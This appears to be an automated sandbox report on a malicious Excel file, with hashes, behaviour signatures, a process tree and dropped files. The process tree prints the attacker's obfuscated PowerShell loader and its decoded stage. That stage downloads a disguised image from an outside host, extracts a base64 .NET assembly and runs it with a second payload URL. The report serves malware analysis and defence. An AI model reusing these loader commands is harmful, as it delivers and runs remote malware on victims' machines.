Analysis

  • max time kernel
    117s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24/01/2024, 10:12

General

  • Target

    Enquiry.xla.xls

  • Size

    219KB

  • MD5

    41b3a7e2538d7217fd54c0e22e50dece

  • SHA1

    f65e7e2dae209eb254c4934e0a8ad80cf4dc8be5

  • SHA256

    7120436f96a877b0b330e9a0825de42cab3972b9b24ee44a150456f6f8e00222

  • SHA512

    90f8c88e3fb098818a17e91f82b59a7a26b4bb7609e1ef95fadbba5cdd3f74f9ccc05671cffaa5c8e7fbf67c0e63c000fab2476dd1a61bf90b9ed590d01fca3e

  • SSDEEP

    6144:FSHBMixiMK6G+ZFrTUvCp4sJg+WxjrxxojBVeM4y:FQpozwjTqCfg+WVfo7z4y

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://wallpapercave.com/uwp/uwp4228677.png

exe.dropper

https://wallpapercave.com/uwp/uwp4228677.png

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Abuses OpenXML format to download file from external location
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Enquiry.xla.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2320
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1552
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CHMupdate.vbs"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:476
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredwBhDgTreGwDgTrebDgTreBwDgTreGEDgTrecDgTreBlDgTreHIDgTreYwBhDgTreHYDgTreZQDgTreuDgTreGMDgTrebwBtDgTreC8DgTredQB3DgTreHDgTreDgTreLwB1DgTreHcDgTrecDgTreDgTre0DgTreDIDgTreMgDgTre4DgTreDYDgTreNwDgTre3DgTreC4DgTrecDgTreBuDgTreGcDgTreJwDgTre7DgTreCQDgTredwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreTgBlDgTreHcDgTreLQBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreTgBlDgTreHQDgTreLgBXDgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBVDgTreHIDgTrebDgTreDgTrepDgTreDsDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreQQBzDgTreHDgTreDgTrebwBzDgTreGUDgTreLgBEDgTreHIDgTreYQB3DgTreGkDgTrebgBnDgTreFMDgTrecDgTreBlDgTreGMDgTreLgBQDgTreGsDgTreaQBrDgTreEEDgTredDgTreB0DgTreHIDgTreQwBlDgTreHIDgTredDgTreBODgTreEIDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreUgB1DgTreG4DgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTrexDgTreDDgTreDgTreNwDgTreuDgTreDEDgTreNwDgTreyDgTreC4DgTreMwDgTrexDgTreC4DgTreMQDgTre3DgTreDkDgTreLwDgTrezDgTreDkDgTreOQDgTrevDgTreEsDgTreTDgTreBNDgTreC4DgTredDgTreB4DgTreHQDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreHYDgTreYgBjDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCwDgTreIDgTreDgTrenDgTreEwDgTrebgBrDgTreE4DgTreYQBtDgTreGUDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTrepDgTreCkDgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2852
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4228677.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Aspose.DrawingSpec.PkikAttrCertNB');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('http://107.172.31.179/399/KLM.txt' , 'desativado' , '2' , 'vbc' , '1' , 'C:\ProgramData\', 'LnkName','RegAsm'))"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2324

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{476D24C9-CE5E-4E82-9BEF-7D11C62E51F8}.FSD

            Filesize

            128KB

            MD5

            72a228739bd0105420c21b91426c1f73

            SHA1

            6308c53c5d058f0df45a831a5d87ff2830d56cab

            SHA256

            fd273f2033c7120ced95a50d20a890f4a5ba416404b94072e783b70ddec8c803

            SHA512

            3248dd99301aa606860252b367d55b3d4a64b4cc948a345a51fbd638f5ef3973ff0621ff2d9275f349654c1b3dd519e34ebd033f1ff1cb488cb29b96b3c4a783

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

            Filesize

            128KB

            MD5

            a7ca7c871e326120d8019d20e2d720f0

            SHA1

            64c603bf933dc52673c563f46e26aee5b2a7152d

            SHA256

            1f3268c302d61fec5cd10e4f5fe17de4c71d737b98b22781d9921e6b90292c0d

            SHA512

            b705cf91863812647fc7014b81b0f40bbb7018453738db552173df7eb0b4ea735f5b203f65aea6baab1fe998c970f7915e4ddc794d73c300888aa4a91c9952b5

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{014DBD28-FB60-4CFB-B328-3E52B9B5FD4D}.FSD

            Filesize

            128KB

            MD5

            76d790d693866accf785b9a5f4080cee

            SHA1

            ad3ded0ac6ea3c384419b20a221d18630b9c5462

            SHA256

            52cde39afd1e7de4750a377c82d157290ed70adc320b921f1481cbfc0f34af7a

            SHA512

            ff7a331fd7de883f21f00d2ff0d05c1b69cbd156a05b041fc140faa50d6264549a0b8e1e541562e01bfcad62ef52ec5474c2a2a8a87da957976037339c4f7f34

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U9VC31Q9\microsoftinternationalconferencegoingtostartsoonforinternationalpaymentmodeprocesstoupdateofficeandentirethings[1].doc

            Filesize

            57KB

            MD5

            4ba3d8e7d6e2dfd627a47eee2fd4f858

            SHA1

            2dd344c464504ea1be755e2efa9c7ca9fea9292d

            SHA256

            79cd3b724c1e29309b15e1d87522afcac2ae93795a807ed07e1b5891b43bd5c9

            SHA512

            6a826a163219bcf4ca27baf5c0ae65523dbf03bba40b0210c858a99ed72ea57891ce9bd6ec1ff32dbcbc940c2f5002e3dba5464ab58ea804dc5068192832bee0

          • C:\Users\Admin\AppData\Local\Temp\{9073716A-F92D-4CD9-AF06-8C5AF411700B}

            Filesize

            128KB

            MD5

            ff2ef770ccbc978297d4af673bcd66ec

            SHA1

            3400fbef0558b3c79adfb9253b57b1179bcbaffa

            SHA256

            857a387c5a57a3584145f05c23626fe64d05ae81b6ef1e3a13f5f135dbd05217

            SHA512

            fee6c2f3ad14398fabda50a3e5a46dd242302778404538598048a8faf8d3b3ee8f6d1ce42f90fc80cb8dd1e8a246effebe6f4bf421d71f4fa4e23e2eb0e1f36d

          • C:\Users\Admin\AppData\Roaming\CHMupdate.vbs

            Filesize

            2KB

            MD5

            004a6d2c964f5b9d9b6e6ea2bd6efce9

            SHA1

            a03caa1a590c09b33357f4279684a0edceb0830c

            SHA256

            de77e5cc5124d82409294bf08965930de2aa51b56b6b1696f45fd102972379ba

            SHA512

            f9abed05c186ed08e724ae3488b4624966f6766d8ec1302e95c126857d5f6a37374846b16b37f0e5d4ebe9bf158d9e993443a2298164cec19d357b4503792243

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            5909a0715ff553438d8e5055c5b566c6

            SHA1

            c6bc101b33ac24fb1e19fee379b669c7ffad5140

            SHA256

            438a8040d39631c88497cfba77b0ff175d9bc01815f9ba2383318b4e2ff14a87

            SHA512

            24f5e1cb876473ffbed3f7a4eb007f84d3926d2a11df29f032bbd87d2593c79a5c0c58f9e9d5b7ff3ee81f728220216257e589a93efde3839350d4c13bf7ac80

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            b83e1788aa5d7055d50fe70e8683b439

            SHA1

            42963f2380b133140fdf842d1b83ded14fe02ae9

            SHA256

            2e5c98f3bd6ec625806039b88142d4a96b558f07f13f49b0886ce8fa5cfdd02f

            SHA512

            87a43aef0ea4c7c0d0df50d42856864641f44ffcd3fd5d70ec388fb7e6e1251ca1e52d8b7859a54d0be9e31b28a9f504de3db174b566a2a0ff80f02923bb571b

          • memory/2320-8-0x0000000002410000-0x0000000002412000-memory.dmp

            Filesize

            8KB

          • memory/2320-105-0x0000000072A0D000-0x0000000072A18000-memory.dmp

            Filesize

            44KB

          • memory/2320-1-0x0000000072A0D000-0x0000000072A18000-memory.dmp

            Filesize

            44KB

          • memory/2320-138-0x0000000072A0D000-0x0000000072A18000-memory.dmp

            Filesize

            44KB

          • memory/2320-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2324-108-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2324-107-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2324-106-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2720-134-0x0000000072A0D000-0x0000000072A18000-memory.dmp

            Filesize

            44KB

          • memory/2720-3-0x000000002FF21000-0x000000002FF22000-memory.dmp

            Filesize

            4KB

          • memory/2720-133-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2720-7-0x00000000024A0000-0x00000000024A2000-memory.dmp

            Filesize

            8KB

          • memory/2720-5-0x0000000072A0D000-0x0000000072A18000-memory.dmp

            Filesize

            44KB

          • memory/2720-110-0x0000000072A0D000-0x0000000072A18000-memory.dmp

            Filesize

            44KB

          • memory/2852-98-0x0000000002180000-0x00000000021C0000-memory.dmp

            Filesize

            256KB

          • memory/2852-109-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2852-99-0x0000000002180000-0x00000000021C0000-memory.dmp

            Filesize

            256KB

          • memory/2852-97-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2852-96-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

            Filesize

            5.7MB